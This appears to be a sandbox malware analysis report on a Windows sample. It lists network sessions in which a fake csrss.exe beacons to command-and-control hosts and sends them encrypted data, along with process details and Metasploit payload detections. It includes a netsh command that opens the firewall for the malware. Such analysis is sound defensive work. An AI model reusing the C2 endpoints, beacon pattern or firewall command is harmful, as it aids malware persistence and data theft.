2021-11-11 00:57:26 UTC	19	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Nov 2021 00:57:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-powered-by: PHP/8.0.11 CF-Cache-Status: DYNAMIC Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bKtxxp476cwRWpL7PMsiOEiUQCqwyb3bZEaJ0AAlC%2FT9jGwQdvS7Se%2BfmHEOErvcAP%2B4zdZUYVGNLmzkEYvbf2eQj3YtbAsdfhB5eIGhFyxOPCEF4oO6j5HX%2FobEjzLNcm0pI2mw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6ac39101ef046927-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
2021-11-11 00:57:26 UTC	20	IN	Data Raw: 34 61 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 39 70 74 20 22 56 65 72 64 61 6e 61 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 Data Ascii: 4a8<!DOCTYPE html><html><head> <meta charset="utf-8" /> <title>Not Found (#404)</title> <style> body { font: normal 9pt "Verdana"; color: #000; background: #fff; } h1 {
2021-11-11 00:57:26 UTC	21	IN	Data Raw: 20 22 56 65 72 64 61 6e 61 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 76 65 72 73 69 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 67 72 61 79 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 38 70 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 61 61 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 65 6d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c Data Ascii: "Verdana"; color: #000; } .version { color: gray; font-size: 8pt; border-top: 1px solid #aaa; padding-top: 1em; margin-bottom: 1em; } </style></head><
2021-11-11 00:57:26 UTC	21	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49749	104.21.34.203	443	C:\Windows\rss\csrss.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-11 00:57:29 UTC	21	OUT	POST /api/log HTTP/1.1 Host: runmodes.com User-Agent: Go-http-client/1.1 Content-Length: 132 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip
2021-11-11 00:57:29 UTC	21	OUT	Data Raw: 55 33 2f 36 31 6c 2b 6b 4c 48 31 69 49 4a 41 49 76 71 79 64 37 55 4e 55 63 69 51 4f 36 4a 39 70 30 41 2f 72 61 70 44 41 45 76 73 46 52 4c 6b 49 30 62 61 49 45 39 4a 70 77 77 71 48 34 4b 4d 2f 71 4c 35 53 77 59 4c 73 6f 44 6d 49 41 2f 62 72 4e 4b 4d 61 63 4f 46 47 41 72 6c 69 68 31 43 61 6d 4e 6d 57 71 6c 4b 64 77 61 4a 45 76 54 2b 39 4b 47 70 42 71 35 43 44 78 58 54 49 47 67 2b 75 37 67 3d 3d Data Ascii: U3/61l+kLH1iIJAIvqyd7UNUciQO6J9p0A/rapDAEvsFRLkI0baIE9JpwwqH4KM/qL5SwYLsoDmIA/brNKMacOFGArlih1CamNmWqlKdwaJEvT+9KGpBq5CDxXTIGg+u7g==
2021-11-11 00:57:29 UTC	21	IN	HTTP/1.1 200 OK Date: Thu, 11 Nov 2021 00:57:29 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VyqJdFK9C8SN%2BxUGjV5xrMiZwo7X7ojpe%2BJ9gkaT0LAMY7mP9r15bftL7%2BilJqKAlQpYnxOV6ufwEkwSyOrShNubJWJa1Zwhw44yTnybBgDNVepuofVl9tVybkDCX%2Bc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6ac39119af7942d5-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49750	104.21.79.9	443	C:\Windows\rss\csrss.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-11 00:57:31 UTC	22	OUT	POST /api/poll HTTP/1.1 Host: server8.trumops.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36 Content-Length: 652 Accept-Encoding: gzip
2021-11-11 00:57:31 UTC	22	OUT	Data Raw: 4b 38 6a 58 39 4f 57 4d 58 56 70 64 78 6e 4e 35 31 61 63 37 56 45 43 76 4e 73 55 74 34 75 49 74 55 4c 31 37 4f 52 77 6a 76 4a 2f 59 52 31 34 79 2f 32 7a 2f 58 4f 56 52 39 64 56 76 48 5a 6c 57 42 45 34 45 49 38 50 66 45 56 53 71 42 48 52 55 4d 68 59 76 50 41 58 6c 79 4d 50 72 53 5a 48 32 42 72 52 42 37 43 69 77 57 6e 6c 4b 41 4d 76 4e 5a 4e 37 63 4b 31 63 50 37 4e 6d 33 71 43 44 7a 54 43 76 41 43 49 52 79 42 7a 48 6f 6f 6d 43 7a 52 76 77 68 43 57 74 76 6d 61 63 78 52 48 49 6d 6b 75 62 6b 68 55 5a 73 54 30 4d 39 30 55 72 52 6c 4a 32 30 64 44 53 79 73 6f 4e 68 76 78 6b 58 6b 47 70 2b 6e 53 4d 4e 2f 4e 31 6c 56 4b 44 66 6f 34 66 31 46 30 75 4b 4f 70 31 37 6e 36 50 52 43 38 43 33 34 75 37 6e 77 67 64 6e 58 62 69 45 76 47 65 64 66 36 75 62 6b 73 53 66 69 5a 35 Data Ascii: K8jX9OWMXVpdxnN51ac7VECvNsUt4uItUL17ORwjvJ/YR14y/2z/XOVR9dVvHZlWBE4EI8PfEVSqBHRUMhYvPAXlyMPrSZH2BrRB7CiwWnlKAMvNZN7cK1cP7Nm3qCDzTCvACIRyBzHoomCzRvwhCWtvmacxRHImkubkhUZsT0M90UrRlJ20dDSysoNhvxkXkGp+nSMN/N1lVKDfo4f1F0uKOp17n6PRC8C34u7nwgdnXbiEvGedf6ubksSfiZ5
2021-11-11 00:57:31 UTC	23	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Nov 2021 00:57:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-powered-by: PHP/8.0.11 set-cookie: PHPSESSID=gv8mampiuh95qf18cj0go9m89u; path=/; HttpOnly expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache access-control-allow-credentials: false CF-Cache-Status: DYNAMIC Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RBPQOW%2BDKJcfajEWjUAp5sEAC%2F%2FnnEUjdXStK%2Byc0Yn65mfutwtYjwiIq%2BUlGvNK0I8GjSutN%2BRWb2fq4knditxLDLYpwlGC1tM5sB3%2F2PrElhih1ODR82MTA1P9qvUN7SYUkd8C"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6ac39121ec73701b-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
2021-11-11 00:57:31 UTC	24	IN	Data Raw: 65 38 0d 0a 54 46 69 6b 7a 67 75 4f 39 61 71 32 2f 67 64 47 51 52 66 46 32 7a 2b 61 79 6f 78 33 6a 62 2b 71 70 4c 75 69 2b 7a 59 2b 2b 6e 39 68 53 53 7a 2f 5a 4b 49 68 59 33 45 70 35 64 4d 45 67 65 63 2b 72 79 4d 7a 58 34 31 5a 6a 42 2b 62 6d 72 51 51 38 4f 59 63 54 4a 58 68 59 78 68 47 4d 72 73 6f 4c 54 75 6e 5a 79 6c 55 32 79 6f 74 51 42 6b 45 53 35 4c 39 6d 52 2b 64 43 55 4e 50 72 66 36 49 68 53 72 4a 33 5a 34 4d 68 75 38 32 78 4a 61 47 38 57 4c 58 58 73 78 72 45 50 74 37 41 41 64 30 7a 49 4b 2f 64 35 56 33 2f 5a 6c 4c 65 73 4e 77 50 44 5a 44 50 5a 4a 61 52 39 6f 44 76 4d 6c 6e 54 2b 51 6c 46 31 53 53 32 6d 55 6b 49 6e 32 71 67 6d 48 65 72 78 75 59 4a 68 49 50 7a 65 45 70 32 33 5a 6e 58 41 3d 3d 0d 0a Data Ascii: e8TFikzguO9aq2/gdGQRfF2z+ayox3jb+qpLui+zY++n9hSSz/ZKIhY3Ep5dMEgec+ryMzX41ZjB+bmrQQ8OYcTJXhYxhGMrsoLTunZylU2yotQBkES5L9mR+dCUNPrf6IhSrJ3Z4Mhu82xJaG8WLXXsxrEPt7AAd0zIK/d5V3/ZlLesNwPDZDPZJaR9oDvMlnT+QlF1SS2mUkIn2qgmHerxuYJhIPzeEp23ZnXA==
2021-11-11 00:57:31 UTC	24	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49751	172.67.139.144	443	C:\Windows\rss\csrss.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-11 00:57:46 UTC	24	OUT	GET /api/cdn?c=3e3f6b9a36a75d40&uuid=f7873597-7b36-4441-9416-097456f134ae HTTP/1.1 Host: server8.trumops.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2021-11-11 00:57:46 UTC	24	IN	HTTP/1.1 200 OK Date: Thu, 11 Nov 2021 00:57:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-powered-by: PHP/8.0.11 access-control-allow-credentials: false CF-Cache-Status: DYNAMIC Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CM%2FrIhBKgG20%2BqPmJLNt9KnFum7hSY2ZhshN5CwoR1EpGJacvDIwP9IxmL4j9XgxPa%2F5x4MWnFzO7NsDvxwaGVTqz6hMc8uB8CenUSjE3KJeFotS3I65qzd970115mE7QLIpEfxq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6ac3917ed8c4749d-LHR alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
2021-11-11 00:57:46 UTC	25	IN	Data Raw: 31 33 34 0d 0a 46 76 66 74 38 72 39 6a 57 59 4f 4f 52 4a 64 55 41 7a 36 58 41 54 5a 42 69 6c 52 54 67 4e 41 30 48 2b 4d 5a 75 50 55 4c 49 75 69 78 59 57 38 34 4d 38 30 42 74 7a 45 34 72 48 5a 79 37 43 56 54 51 64 63 55 30 77 6e 30 75 75 74 48 47 70 64 6a 6d 56 36 6c 70 6e 61 6e 6b 47 66 5a 49 58 6c 4c 6f 30 71 2f 78 39 71 76 47 45 2f 53 72 44 77 4a 68 73 46 38 6f 46 63 47 73 71 2f 53 50 68 46 78 63 68 59 63 68 41 39 69 77 39 4b 55 43 4b 4c 58 77 71 61 6a 47 36 6d 79 59 4d 58 5a 6b 45 7a 65 38 76 77 33 67 53 51 53 39 4a 70 37 31 70 64 61 36 36 43 56 49 6e 4b 35 61 62 39 6b 55 58 53 38 4f 51 32 61 4c 48 58 33 41 50 49 35 74 6e 53 44 57 4e 48 63 55 50 46 4c 75 37 44 49 71 44 75 6c 64 61 78 72 70 79 5a 53 36 42 4e 72 6a 6a 51 4a 4d 32 6a 71 30 53 4f 34 35 67 Data Ascii: 134Fvft8r9jWYOORJdUAz6XATZBilRTgNA0H+MZuPULIuixYW84M80BtzE4rHZy7CVTQdcU0wn0uutHGpdjmV6lpnankGfZIXlLo0q/x9qvGE/SrDwJhsF8oFcGsq/SPhFxchYchA9iw9KUCKLXwqajG6myYMXZkEze8vw3gSQS9Jp71pda66CVInK5ab9kUXS8OQ2aLHX3API5tnSDWNHcUPFLu7DIqDuldaxrpyZS6BNrjjQJM2jq0SO45g
2021-11-11 00:57:46 UTC	25	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49754	172.67.207.136	443	C:\Windows\rss\csrss.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-11 00:57:56 UTC	25	OUT	POST /api/log HTTP/1.1 Host: runmodes.com User-Agent: Go-http-client/1.1 Content-Length: 160 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip
2021-11-11 00:57:56 UTC	26	OUT	Data Raw: 62 4c 33 56 34 47 6f 46 6e 33 6f 4b 50 75 70 68 68 49 53 58 53 4b 34 6e 2b 58 76 64 6e 68 76 39 67 30 50 6a 4e 69 69 6b 55 30 70 50 43 55 55 4e 51 6f 4d 31 70 45 74 6e 36 6d 62 77 6b 57 58 59 62 34 74 65 6b 6b 4f 39 6c 45 71 6b 48 54 34 4a 6a 50 56 68 62 6f 5a 54 79 32 78 30 7a 30 52 2b 64 66 35 6f 33 51 4c 47 73 53 41 36 43 62 76 47 44 7a 50 75 59 37 4c 66 4a 5a 36 30 6a 4e 4a 5a 4e 67 61 30 4a 75 37 42 42 75 4c 4b 43 50 6a 38 39 31 38 53 39 6d 6f 62 45 6a 4a 66 73 51 3d 3d Data Ascii: bL3V4GoFn3oKPuphhISXSK4n+Xvdnhv9g0PjNiikU0pPCUUNQoM1pEtn6mbwkWXYb4tekkO9lEqkHT4JjPVhboZTy2x0z0R+df5o3QLGsSA6CbvGDzPuY7LfJZ60jNJZNga0Ju7BBuLKCPj8918S9mobEjJfsQ==
2021-11-11 00:57:56 UTC	26	IN	HTTP/1.1 200 OK Date: Thu, 11 Nov 2021 00:57:56 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=83uhlx7ebvkDKlumTtxZ442jGpnIhj5F%2B3khHvd7TZu3XPc97SCIQF1iHIOs0R9z8lBEea9j4dVYkQKRQs%2FnXFqQ89FZxq3u2kjYA8Iye%2Fu6dSB2i1rf40fLuIeEY9M%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6ac391bd4873c303-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49808	172.67.139.144	443	C:\Windows\rss\csrss.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-11 00:58:41 UTC	26	OUT	POST /api/poll HTTP/1.1 Host: server8.trumops.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0 Content-Length: 668 Accept-Encoding: gzip
2021-11-11 00:58:41 UTC	27	OUT	Data Raw: 53 62 4f 56 7a 31 57 59 6d 47 43 56 51 2f 55 31 56 53 5a 78 35 78 59 30 55 41 31 62 4d 5a 55 58 4a 65 54 7a 6e 43 54 35 78 39 79 5a 57 6e 72 78 74 76 51 2f 67 37 55 53 69 42 44 30 4f 72 2b 4a 62 35 35 47 64 50 71 4d 43 73 5a 73 63 6b 57 4a 65 4d 34 50 62 53 33 46 2b 31 78 75 31 6f 4d 43 50 38 47 61 76 71 71 4d 47 45 77 4a 58 69 67 4f 7a 73 32 66 2b 57 46 35 43 47 56 59 47 6d 69 68 46 48 57 4a 59 67 6a 41 4b 7a 50 62 70 7a 65 73 37 64 76 33 30 57 46 30 67 74 2b 47 70 75 53 77 6e 7a 42 32 66 31 43 39 38 33 30 56 57 52 54 75 69 67 68 4a 69 6d 2f 43 61 2b 32 66 36 52 34 67 63 59 78 4c 4a 6b 66 53 58 72 33 6d 54 35 73 6a 79 78 77 70 64 61 6a 34 6c 6b 78 4f 31 41 59 7a 39 48 34 4f 34 6b 48 6d 52 2f 54 6c 2f 43 46 33 6c 50 58 52 54 76 37 45 52 65 37 77 36 70 33 Data Ascii: SbOVz1WYmGCVQ/U1VSZx5xY0UA1bMZUXJeTznCT5x9yZWnrxtvQ/g7USiBD0Or+Jb55GdPqMCsZsckWJeM4PbS3F+1xu1oMCP8GavqqMGEwJXigOzs2f+WF5CGVYGmihFHWJYgjAKzPbpzes7dv30WF0gt+GpuSwnzB2f1C9830VWRTuighJim/Ca+2f6R4gcYxLJkfSXr3mT5sjyxwpdaj4lkxO1AYz9H4O4kHmR/Tl/CF3lPXRTv7ERe7w6p3
2021-11-11 00:58:41 UTC	27	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Nov 2021 00:58:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-powered-by: PHP/8.0.11 set-cookie: PHPSESSID=4ujbsd6crmkskigbel52akbion; path=/; HttpOnly expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache access-control-allow-credentials: false CF-Cache-Status: DYNAMIC Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ryIHSGUMxFPJ%2F1e4qghNO%2FLH6YHJuD1QQg3lP1u0%2BXF1eYpABsushydm506ZkuU1RkdCCxRbUIoxtS3RvmeD7XMScKD9Nd4FY3%2Bt%2Fz7lrD9OZ3nlNfnYz5B0JVNarhQrNImsp3fS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6ac392db8b07f407-LHR alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
2021-11-11 00:58:41 UTC	28	IN	Data Raw: 65 38 0d 0a 39 38 47 41 34 49 33 50 2f 6f 71 6a 79 76 69 64 75 6c 6d 66 71 58 53 32 54 74 4c 50 51 63 42 54 62 64 6c 47 49 72 39 45 68 30 66 57 32 78 4a 54 39 67 49 48 2f 6b 6d 39 45 35 54 4e 6c 57 47 50 77 78 79 2b 53 43 38 59 46 32 76 74 41 2b 30 51 73 66 42 6b 74 4a 75 4e 77 34 74 41 2b 4c 39 54 65 69 56 4b 4e 50 77 4b 52 51 46 66 7a 51 62 62 37 36 35 6b 71 74 57 45 31 5a 30 4a 77 4f 6f 2b 73 57 73 71 55 48 6c 63 74 57 37 76 66 73 73 57 45 37 73 62 63 57 36 6a 36 31 31 75 49 52 30 66 35 54 71 53 78 52 75 4c 42 58 33 51 69 55 6c 33 65 6e 50 39 4f 4e 77 4e 6c 74 78 71 75 59 67 35 74 53 41 79 35 30 6a 59 6e 77 74 66 32 44 35 6f 76 6a 64 66 32 6f 7a 48 6a 32 75 51 4f 71 70 6f 53 64 78 52 7a 41 3d 3d 0d 0a Data Ascii: e898GA4I3P/oqjyvidulmfqXS2TtLPQcBTbdlGIr9Eh0fW2xJT9gIH/km9E5TNlWGPwxy+SC8YF2vtA+0QsfBktJuNw4tA+L9TeiVKNPwKRQFfzQbb765kqtWE1Z0JwOo+sWsqUHlctW7vfssWE7sbcW6j611uIR0f5TqSxRuLBX3QiUl3enP9ONwNltxquYg5tSAy50jYnwtf2D5ovjdf2ozHj2uQOqpoSdxRzA==
2021-11-11 00:58:41 UTC	29	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: 4t4y4r89UZ.exe PID: 5272 Parent PID: 4856

General

Start time:	01:56:58
Start date:	11/11/2021
Path:	C:\Users\user\Desktop\4t4y4r89UZ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\4t4y4r89UZ.exe"
Imagebase:	0x400000
File size:	4520488 bytes
MD5 hash:	14C0D8425930CCEC0566B04864A05670
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.295699517.0000000005040000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.291152945.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: svchost.exe PID: 6436 Parent PID: 572

General

Start time:	01:57:00
Start date:	11/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: svchost.exe PID: 4072 Parent PID: 572

General

Start time:	01:57:01
Start date:	11/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: svchost.exe PID: 6272 Parent PID: 572

General

Start time:	01:57:01
Start date:	11/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: svchost.exe PID: 3076 Parent PID: 572

General

Start time:	01:57:02
Start date:	11/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: svchost.exe PID: 6336 Parent PID: 572

General

Start time:	01:57:02
Start date:	11/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: svchost.exe PID: 6896 Parent PID: 572

General

Start time:	01:57:02
Start date:	11/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k unistacksvcgroup
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: SgrmBroker.exe PID: 6784 Parent PID: 572

General

Start time:	01:57:03
Start date:	11/11/2021
Path:	C:\Windows\System32\SgrmBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\SgrmBroker.exe
Imagebase:	0x7ff7d8ac0000
File size:	163336 bytes
MD5 hash:	D3170A3F3A9626597EEE1888686E3EA6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: svchost.exe PID: 6848 Parent PID: 572

General

Start time:	01:57:04
Start date:	11/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: TrustedInstaller.exe PID: 6756 Parent PID: 572

General

Start time:	01:57:04
Start date:	11/11/2021
Path:	C:\Windows\servicing\TrustedInstaller.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\servicing\TrustedInstaller.exe
Imagebase:	0x7ff6564e0000
File size:	131584 bytes
MD5 hash:	4578046C54A954C917BB393B70BA0AEB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: 4t4y4r89UZ.exe PID: 5300 Parent PID: 5272

General

Start time:	01:57:05
Start date:	11/11/2021
Path:	C:\Users\user\Desktop\4t4y4r89UZ.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\4t4y4r89UZ.exe
Imagebase:	0x400000
File size:	4520488 bytes
MD5 hash:	14C0D8425930CCEC0566B04864A05670
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000000A.00000002.321014783.0000000004FD0000.00000040.00000001.sdmp, Author: Joe Security

Analysis Process: cmd.exe PID: 2012 Parent PID: 5300

General

Start time:	01:57:11
Start date:	11/11/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
Imagebase:	0x7ff64bd60000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 7108 Parent PID: 2012

General

Start time:	01:57:11
Start date:	11/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: netsh.exe PID: 7080 Parent PID: 2012

General

Start time:	01:57:11
Start date:	11/11/2021
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
Imagebase:	0x7ff7c1c10000
File size:	92672 bytes
MD5 hash:	98CC37BBF363A38834253E22C80A8F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

